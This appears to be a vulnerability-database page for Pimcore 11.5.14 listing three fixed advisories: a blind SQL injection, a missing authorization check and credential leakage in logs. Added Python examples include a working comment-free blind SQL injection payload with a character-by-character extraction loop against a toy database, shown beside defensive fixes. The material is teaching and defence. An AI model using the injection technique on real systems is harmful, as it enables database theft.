| purl | pkg:composer/pimcore/pimcore@11.5.14 |
Vulnerabilities affecting this package version:
| Vulnerability | Summary | Fixed by |
|---|---|---|
| This package is not known to be affected by vulnerabilities. | | |
Vulnerabilities fixed by this package version:
| Vulnerability | Summary | Aliases |
|---|---|---|
| VCID-53nb-8vf3-9ubb | Pimcore Has an Incomplete Patch for CVE-2023-30848. An **incomplete SQL injection patch** in the Admin Search Find API allows an authenticated attacker to perform **blind SQL injection**. Although the fix for CVE-2023-30848 attempted to mitigate SQL injection by removing SQL comments (`--`) and catching syntax errors, it is insufficient: attackers can still inject SQL payloads that do not rely on comments and infer database contents through blind (boolean-based) techniques. This vulnerability affects the admin interface and can lead to **database information disclosure**. | CVE-2026-23492, GHSA-qvr7-7g55-69xj |
| VCID-xvhk-gv9z-53hb | Pimcore is Vulnerable to Broken Access Control: Missing Function Level Authorization on "Static Routes" Listing. The application fails to enforce server-side authorization checks on the API endpoint that reads or lists static routes. In Pimcore, static routes are custom URL patterns defined via the backend interface or the `var/config/staticroutes.php` file, including regex-based patterns, controllers, variables and priorities. These routes are registered automatically through the PimcoreStaticRoutesBundle and integrated into the MVC routing system. Testing showed that an authenticated backend user without explicit permissions was able to invoke the endpoint (e.g., `GET /api/static-routes`) and retrieve the route configuration. This is OWASP A01:2021 Broken Access Control: function-level authorization is absent, so internal routing metadata is exposed to users who should not see it. The endpoint reveals route structures and thereby application architecture, endpoints and custom logic intended for administrative roles only. | CVE-2026-23494, GHSA-m3r2-724c-pwgf |
| VCID-yrnf-q3z4-jfh1 | Pimcore ENV Variables and Cookie Information Are Exposed in http_error_log. The http_error_log file stores the `$_COOKIE` and `$_SERVER` variables, so sensitive information such as database passwords, session cookie data and other details can be accessed or recovered through the Pimcore backend. | CVE-2026-23493, GHSA-q433-j342-rp9h |
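The first advisory's point is that stripping comment tokens and swallowing syntax errors is a blacklist, and blind SQL injection needs neither comments nor error messages. The following is an added illustration of that pattern, not Pimcore's code: a search function guarded only by comment stripping and a catch-all, a boolean oracle whose payload contains no comment token, a character-by-character extraction loop, and the parameterized form that closes the oracle. The schema, the table and column names (`documents`, `settings.api_key`) and the secret value are constructed for the example.

```python
import sqlite3
import string

# Constructed sample secret standing in for any sensitive column value.
SECRET = "k9x2ab"


def make_db():
    """Build an in-memory database with a searchable table and a secret."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE documents (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO documents (title) VALUES ('Home'), ('About us'), ('Contact');
        CREATE TABLE settings (api_key TEXT);
    """)
    conn.execute("INSERT INTO settings (api_key) VALUES (?)", (SECRET,))
    return conn


def strip_comments(term):
    """The insufficient mitigation pattern the advisory describes: delete SQL
    comment tokens and rely on the rest of the input being harmless."""
    for token in ("--", "/*", "*/", "#"):
        term = term.replace(token, "")
    return term


def search_filtered(conn, term):
    """Vulnerable: concatenated query guarded only by comment stripping and a
    catch-all for syntax errors. Neither stops boolean-based inference."""
    sql = "SELECT id FROM documents WHERE title LIKE '%" + strip_comments(term) + "%'"
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError:
        return []


def search_parameterized(conn, term):
    """Hardened: the term is bound as a parameter and cannot alter query structure."""
    rows = conn.execute("SELECT id FROM documents WHERE title LIKE ?", ("%" + term + "%",))
    return [row[0] for row in rows]


def starts_with(search, conn, prefix):
    """Boolean oracle: does settings.api_key start with `prefix`?
    The payload uses no comment token, so comment stripping leaves it intact.
    'zzz' matches no title; the trailing "'a' LIKE 'a" absorbs the template's
    closing quote and wildcard so the statement stays syntactically valid."""
    payload = ("zzz' OR substr((SELECT api_key FROM settings),1,%d)='%s' AND 'a' LIKE 'a"
               % (len(prefix), prefix))
    return len(search(conn, payload)) > 0


def blind_extract(search, conn, max_len=32, charset=string.ascii_lowercase + string.digits):
    """Recover the secret one character at a time through the oracle."""
    recovered = ""
    for _ in range(max_len):
        for ch in charset:
            if starts_with(search, conn, recovered + ch):
                recovered += ch
                break
        else:
            break  # nothing extends the prefix: done, or the oracle is closed
    return recovered


if __name__ == "__main__":
    conn = make_db()
    print("filtered endpoint leaks:", repr(blind_extract(search_filtered, conn)))
    print("parameterized endpoint leaks:", repr(blind_extract(search_parameterized, conn)))
```

Run against `search_filtered` the loop recovers the full secret; against `search_parameterized` every probe returns no rows and the loop recovers nothing. The lesson generalizes beyond this one endpoint: any fix that edits the attacker's string rather than binding it as a parameter leaves a comment-free payload available.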
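The second advisory is a missing function-level authorization check on a read-only listing endpoint. The added example below (not Pimcore's code; the permission name `routes`, the path `/api/static-routes` from the advisory text, and the route records are constructed) shows the check a practitioner wants: every handler declares the permission it needs, the check runs server-side before the handler body, dispatch defaults to deny when a handler declares nothing, and an audit function reports handlers that slipped through without a declaration.

```python
from functools import wraps


class Forbidden(Exception):
    """Raised when a caller lacks the permission a handler requires."""


class User:
    def __init__(self, name, permissions=(), authenticated=True):
        self.name = name
        self.permissions = frozenset(permissions)
        self.authenticated = authenticated


# Constructed sample of the kind of data a static-routes listing returns.
STATIC_ROUTES = [
    {"name": "news-detail", "pattern": "/news/(\\d+)_(.*)",
     "controller": "App\\Controller\\NewsController::detailAction", "priority": 10},
    {"name": "legacy-redirect", "pattern": "/old/(.*)",
     "controller": "App\\Controller\\LegacyController::redirectAction", "priority": 1},
]

HANDLERS = {}  # path -> handler


def requires(permission):
    """Function-level authorization: the handler states the permission it needs and
    the check runs before the body, for read-only listings as well as writes."""
    def decorate(fn):
        @wraps(fn)
        def guarded(user, *args, **kwargs):
            if not user.authenticated or permission not in user.permissions:
                raise Forbidden(f"{user.name} lacks permission '{permission}'")
            return fn(user, *args, **kwargs)
        guarded.required_permission = permission
        return guarded
    return decorate


def register(path):
    def decorate(fn):
        HANDLERS[path] = fn
        return fn
    return decorate


@register("/api/static-routes")
@requires("routes")
def list_static_routes(user):
    return STATIC_ROUTES


def dispatch(path, user):
    """Default deny: a registered handler with no declared permission is treated
    as a bug, not as an open endpoint."""
    handler = HANDLERS[path]
    if getattr(handler, "required_permission", None) is None:
        raise Forbidden(f"{path} declares no permission; refusing")
    return handler(user)


def audit_unguarded():
    """Paths whose handler declares no permission; a unit test should assert this is empty."""
    return sorted(p for p, h in HANDLERS.items()
                  if getattr(h, "required_permission", None) is None)


if __name__ == "__main__":
    admin = User("admin", {"routes", "documents"})
    editor = User("editor", {"documents"})
    print(len(dispatch("/api/static-routes", admin)), "routes for admin")
    try:
        dispatch("/api/static-routes", editor)
    except Forbidden as exc:
        print("editor:", exc)
    print("unguarded handlers:", audit_unguarded())
```

The audit is the part that catches the class of bug the advisory describes: an authenticated user is not an authorized user, and a handler that was simply never decorated is indistinguishable at runtime from one that was deliberately left open unless the dispatcher refuses it.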
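The third advisory is the consequence of writing `$_SERVER` and `$_COOKIE` wholesale into a log: many PHP SAPIs merge environment variables into `$_SERVER`, so a DSN with a database password sits beside the request headers, and cookie values are bearer credentials. The added example below (not Pimcore's code) shows the scrubbing a practitioner would put in front of such a log entry: an allowlist of request metadata, the query string dropped from the URI, every other `$_SERVER` key reduced to its name, cookie values redacted, and a leak check that can be asserted in a test. The sample arrays and secret values are constructed.

```python
import re
from typing import Mapping

# $_SERVER keys that help diagnose an HTTP error and carry no credentials.
SAFE_SERVER_KEYS = {
    "REQUEST_METHOD", "REQUEST_URI", "SERVER_NAME", "SERVER_PROTOCOL",
    "HTTP_HOST", "HTTP_USER_AGENT", "HTTP_REFERER", "REMOTE_ADDR", "REQUEST_TIME",
}
# Belt and braces: even an allowlisted key is dropped if its name looks like a credential.
SENSITIVE_KEY = re.compile(r"PASS|SECRET|TOKEN|KEY|DSN|DATABASE_URL|AUTHORIZATION|COOKIE", re.I)
REDACTED = "<redacted>"


def scrub_server(server: Mapping[str, str]) -> dict:
    """Allowlist approach: keep known-harmless request metadata, keep every other
    key's *name* (so the log still shows what was present) but not its value."""
    out = {}
    for key, value in server.items():
        if key in SAFE_SERVER_KEYS and not SENSITIVE_KEY.search(key):
            if key == "REQUEST_URI":
                value = value.split("?", 1)[0]  # query strings carry tokens too
            out[key] = value
        else:
            out[key] = REDACTED
    return out


def scrub_cookies(cookies: Mapping[str, str]) -> dict:
    """Cookie names identify the session mechanism; values are the credential."""
    return {name: REDACTED for name in cookies}


def build_error_entry(status: int, server: Mapping[str, str], cookies: Mapping[str, str]) -> dict:
    return {"status": status, "server": scrub_server(server), "cookies": scrub_cookies(cookies)}


def leaks(entry, secrets):
    """Which known secrets appear anywhere in the serialized log entry?"""
    blob = repr(entry)
    return [s for s in secrets if s in blob]


# Constructed sample of what an unfiltered $_SERVER / $_COOKIE dump can contain.
SAMPLE_SERVER = {
    "REQUEST_METHOD": "GET",
    "REQUEST_URI": "/admin/missing-page?token=qs-t0k3n",
    "HTTP_HOST": "cms.example.test",
    "HTTP_USER_AGENT": "Mozilla/5.0",
    "HTTP_COOKIE": "PHPSESSID=s3ss10nv4lu3; REMEMBERME=r3m3mb3r",
    "HTTP_AUTHORIZATION": "Basic YWRtaW46cGFzc3dvcmQ=",
    "DATABASE_URL": "mysql://pimcore:Db-P4ssw0rd@db:3306/pimcore",
    "APP_SECRET": "0f1e2d3c4b5a69788796a5b4c3d2e1f0",
}
SAMPLE_COOKIES = {"PHPSESSID": "s3ss10nv4lu3", "REMEMBERME": "r3m3mb3r"}
SAMPLE_SECRETS = [
    "qs-t0k3n", "s3ss10nv4lu3", "r3m3mb3r", "YWRtaW46cGFzc3dvcmQ=",
    "Db-P4ssw0rd", "0f1e2d3c4b5a69788796a5b4c3d2e1f0",
]


if __name__ == "__main__":
    raw = {"status": 404, "server": SAMPLE_SERVER, "cookies": SAMPLE_COOKIES}
    print("raw dump leaks:", leaks(raw, SAMPLE_SECRETS))
    print("scrubbed entry leaks:", leaks(build_error_entry(404, SAMPLE_SERVER, SAMPLE_COOKIES), SAMPLE_SECRETS))
```

An allowlist is chosen over a denylist deliberately: the set of things worth logging about a failed request is small and stable, while the set of secret-bearing variable names a deployment might introduce is open-ended.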
| Date | Actor | Action | Vulnerability | Source | VulnerableCode Version |
|---|---|---|---|---|---|
| 2026-06-02T04:49:32.716175+00:00 | GitLab Importer | Fixing | VCID-xvhk-gv9z-53hb | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23494.yml | 38.6.0 |
| 2026-06-02T04:49:32.409352+00:00 | GitLab Importer | Fixing | VCID-yrnf-q3z4-jfh1 | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23493.yml | 38.6.0 |
| 2026-06-02T04:49:31.741499+00:00 | GitLab Importer | Fixing | VCID-53nb-8vf3-9ubb | https://gitlab.com/gitlab-org/advisories-community/-/blob/main/packagist/pimcore/pimcore/CVE-2026-23492.yml | 38.6.0 |